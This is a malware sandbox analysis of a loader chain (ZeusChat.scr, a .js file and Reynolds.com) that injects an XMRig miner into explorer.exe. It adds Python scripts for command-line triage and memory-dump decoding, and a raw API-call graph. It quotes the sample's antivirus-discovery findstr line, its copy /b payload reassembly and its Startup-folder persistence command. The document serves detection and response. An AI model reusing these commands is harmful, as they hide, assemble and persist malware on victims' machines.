                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:14:25:14
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"
                                                                                                    Imagebase:0x7ff668b00000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:14:25:15
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:14:25:20
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
                                                                                                    Imagebase:0x7ff7aa0f0000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:18
                                                                                                    Start time:14:25:25
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:explorer.exe
                                                                                                    Imagebase:0x7ff674740000
                                                                                                    File size:5'141'208 bytes
                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:false

                                                                                                    Target ID:19
                                                                                                    Start time:14:25:25
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:20
                                                                                                    Start time:14:25:34
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:14:25:36
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
                                                                                                    Imagebase:0x7ff752000000
                                                                                                    File size:1'065'128 bytes
                                                                                                    MD5 hash:C63860691927D62432750013B5A20F5F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:14:25:42
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:explorer.exe
                                                                                                    Imagebase:0x7ff674740000
                                                                                                    File size:5'141'208 bytes
                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:24
                                                                                                    Start time:14:25:43
                                                                                                    Start date:24/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

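The process entries above spell out the loader chain in plain command lines: findstr grepping a process list for security products (Target ID 7), a binary reassembled with copy /b from dozens of fragments (9), the result launched under a .com name (10, 17), an [InternetShortcut] .url echoed into the per-user Startup folder that points at a .js (12), and WScript running that .js from AppData (15), which in turn launches a .scr (16). The script below is an added example, not part of the Joe Sandbox report or the sample: each check takes one command line as the report lists it and returns a finding or None. REPORT_CMDLINES are copied from the entries above; BENIGN_CMDLINES are constructed to show what stays unflagged.

```python
"""Command-line triage for the loader chain listed in this report (added example)."""
import re
from typing import Callable, List, Optional

# Security-product process names the sample greps for (Target ID 7), lower-cased.
AV_PROCESS_NAMES = {"avastui", "avgui", "bdservicehost", "nswscsvc", "ekrn", "sophoshealth"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
_EXT_ALT = "|".join(e.lstrip(".") for e in SCRIPT_EXTS)

# copy /b frag1 + frag2 + ... + fragN dest   (the destination is the final token)
FRAGMENT_JOIN = re.compile(r"copy\s+/b\s+(?P<parts>.+?)\s+(?P<dest>\S+)\s*$", re.I)
STARTUP_URL = re.compile(r'\\Start Menu\\Programs\\Startup\\[^"]+\.url', re.I)
URL_TARGET = re.compile(r'URL="([^"]*)"|URL=(\S+)', re.I)
SCRIPT_PATH = re.compile(r'"([^"]+\.(?:%s))"|(\S+\.(?:%s))' % (_EXT_ALT, _EXT_ALT), re.I)
ODD_EXT_EXE = re.compile(r'^\s*(?:"([^"]+\.(?:com|scr|pif))"|(\S+\.(?:com|scr|pif)))(?:\s|$)', re.I)


def check_av_discovery(cmd: str) -> Optional[str]:
    """findstr filtering on two or more security-product process names."""
    low = cmd.lower()
    if "findstr" not in low:
        return None
    hits = sorted(n for n in AV_PROCESS_NAMES if n in low)
    return f"AV discovery via findstr: {', '.join(hits)}" if len(hits) >= 2 else None


def check_fragment_join(cmd: str) -> Optional[str]:
    """Payload reassembled with copy /b from many small fragments."""
    m = FRAGMENT_JOIN.search(cmd)
    if not m:
        return None
    parts = [p.strip() for p in m.group("parts").split("+") if p.strip()]
    if len(parts) < 4:  # joining two or three files is ordinary use of copy /b
        return None
    return f"fragment join of {len(parts)} pieces into '{m.group('dest')}'"


def check_startup_url(cmd: str) -> Optional[str]:
    """[InternetShortcut] file echoed into the per-user Startup folder."""
    if "[internetshortcut]" not in cmd.lower() or not STARTUP_URL.search(cmd):
        return None
    m = URL_TARGET.search(cmd)
    target = (m.group(1) or m.group(2)) if m else "?"
    kind = "script" if target.lower().endswith(SCRIPT_EXTS) else "file"
    return f"Startup-folder .url persistence pointing at {kind}: {target}"


def check_script_host(cmd: str) -> Optional[str]:
    """wscript/cscript running a script stored under the user's AppData."""
    if not re.search(r"\b[wc]script(?:\.exe)?\b", cmd, re.I):
        return None
    m = SCRIPT_PATH.search(cmd)
    if not m:
        return None
    path = m.group(1) or m.group(2)
    return f"script host running script from AppData: {path}" if "\\appdata\\" in path.lower() else None


def check_odd_extension(cmd: str) -> Optional[str]:
    """A PE launched under a .com/.scr/.pif name from outside C:\\Windows."""
    m = ODD_EXT_EXE.search(cmd)
    if not m:
        return None
    path = m.group(1) or m.group(2)
    if path.lower().startswith("c:\\windows\\"):
        return None
    return f"executable with disguised extension: {path}"


CHECKS: List[Callable[[str], Optional[str]]] = [
    check_av_discovery, check_fragment_join, check_startup_url, check_script_host, check_odd_extension,
]


def triage(cmd: str) -> List[str]:
    """All findings for one command line; an empty list means nothing matched."""
    return [f for f in (check(cmd) for check in CHECKS) if f]


# Copied from the process entries in this report (Target IDs 7, 9, 10, 12, 15, 16).
REPORT_CMDLINES = [
    r'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"',
    r"cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l",
    r"Reynolds.com l",
    r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"',
    r'"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"',
]
# Constructed benign lines: ordinary findstr, a two-part copy /b, a script outside AppData, a real screensaver.
BENIGN_CMDLINES = [
    r'findstr "error" build.log',
    r"cmd /c copy /b part1.bin + part2.bin whole.bin",
    r'"C:\Windows\System32\WScript.exe" "C:\Program Files\Vendor\setup.js"',
    r"C:\Windows\System32\scrnsave.scr /s",
]

if __name__ == "__main__":
    for line in REPORT_CMDLINES + BENIGN_CMDLINES:
        print(triage(line) or "-", "<=", line[:80])
```

Note that the destination of the copy /b join is the bare file `l`, which is exactly the argument handed to Reynolds.com one second later (Target ID 10): the reassembled file is the script or payload the renamed .com interprets, so the two findings belong to one chain when correlated by directory (`29442`) and time.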

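The Yara hits on the two explorer.exe entries (Target IDs 18 and 23) name memory dumps rather than files, and the dump identifiers carry the information that matters: the hit at 0x140001000 in Target 23 is in a region with page protection 0x40 (PAGE_EXECUTE_READWRITE) sitting at 0x140000000, the linker default base for 64-bit executables, far from explorer's own image at 0x7ff674740000; the hits at 0x12F8000 and 0xFE1000 carry protection 0x04 (PAGE_READWRITE), i.e. data rather than code. The parser below is an added example, not part of the report. Its field layout is an assumption read off this page's own Source strings: field 1 is the target ID in hex (0x12 = 18, 0x17 = 23 match the two explorer.exe entries), field 4 the region base and field 5 the Win32 page protection; the remaining fields are kept but not interpreted.

```python
"""Decode the memory-dump identifiers behind this report's Yara matches (added example)."""
from dataclasses import dataclass
from typing import Dict, List

# Win32 page-protection constants (winnt.h); only the low byte is a protection class.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
DEFAULT_X64_IMAGEBASE = 0x140000000  # MSVC linker default /BASE for 64-bit EXEs


@dataclass
class DumpRegion:
    target_id: int       # assumed: field 1, the report's Target ID in hex
    address: int         # assumed: field 4, region base address
    protect: int         # assumed: field 5, Win32 page protection
    raw_fields: List[str]

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # PAGE_EXECUTE* classes

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE variants


def parse_dump_source(source: str) -> DumpRegion:
    """Split a '<id>.<run>.<dump>.<address>.<protect>....sdmp' name into its fields."""
    fields = source.split(".")
    if fields and fields[-1].lower() == "sdmp":
        fields = fields[:-1]
    if len(fields) < 5:
        raise ValueError(f"unexpected dump name: {source}")
    return DumpRegion(int(fields[0], 16), int(fields[3], 16), int(fields[4], 16), fields)


def assess(region: DumpRegion, host_imagebase: int) -> List[str]:
    """Short notes on why a Yara hit in this region matters."""
    notes = [f"target {region.target_id}: {region.protect_name} at {region.address:#x}"]
    if region.executable and region.writable:
        notes.append("RWX memory: writable and executable at once, which mapped image sections normally are not")
    if region.executable and DEFAULT_X64_IMAGEBASE <= region.address < DEFAULT_X64_IMAGEBASE + 0x10000000:
        notes.append(f"lies at the 64-bit linker default base {DEFAULT_X64_IMAGEBASE:#x}, not in the host image "
                     f"at {host_imagebase:#x}: consistent with a PE mapped into the process by hand")
    if not region.executable:
        notes.append("non-executable region: a data/string match rather than injected code")
    return notes


# Copied from the Yara matches on Target IDs 18 and 23 in this report.
YARA_SOURCES = [
    "00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp",
    "00000017.00000002.2487104363.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp",
    "00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp",
]
EXPLORER_IMAGEBASE = 0x7FF674740000  # 'Imagebase' of both explorer.exe entries above


def report_hits(sources: List[str] = YARA_SOURCES,
                host_imagebase: int = EXPLORER_IMAGEBASE) -> Dict[str, List[str]]:
    """Assess every dump identifier; returns notes keyed by the source string."""
    return {src: assess(parse_dump_source(src), host_imagebase) for src in sources}


if __name__ == "__main__":
    for src, notes in report_hits().items():
        print(src)
        for n in notes:
            print("   ", n)
```

For incident response the practical consequence is that the miner never touches disk as a standalone xmrig binary in this chain: a memory scan of explorer.exe (or a dump of the RWX region at 0x140000000) is what recovers the payload, and the .scr and .com files on disk are only the loader.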
                                                                                                      Execution Graph

                                                                                                      Execution Coverage:17.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:21%
                                                                                                      Total number of Nodes:1482
                                                                                                      Total number of Limit Nodes:27
                                                                                                      execution_graph: node/edge listing of the 1482 nodes above (rendered as an interactive graph in the original report; the raw dump is not reproduced here). API clusters visible in the dump: file I/O (CreateFileW, ReadFile, WriteFile, SetFilePointer, DeleteFileW, FindClose, GlobalAlloc/GlobalFree), dialog handling (GetDlgItem, SetDlgItemTextW, SendMessageW, SHBrowseForFolderW, GetDiskFreeSpaceW, MulDiv, SetTimer, GetAsyncKeyState), process enumeration (OpenProcess, lstrcmpW, CloseHandle), dynamic API resolution (LoadLibraryA, GetProcAddress, FreeLibrary, GetVersionExW) and string handling (wsprintfW, lstrcpynW, lstrlenW, CharUpperW).
4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 
4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 
4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 
OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 
API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 
4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 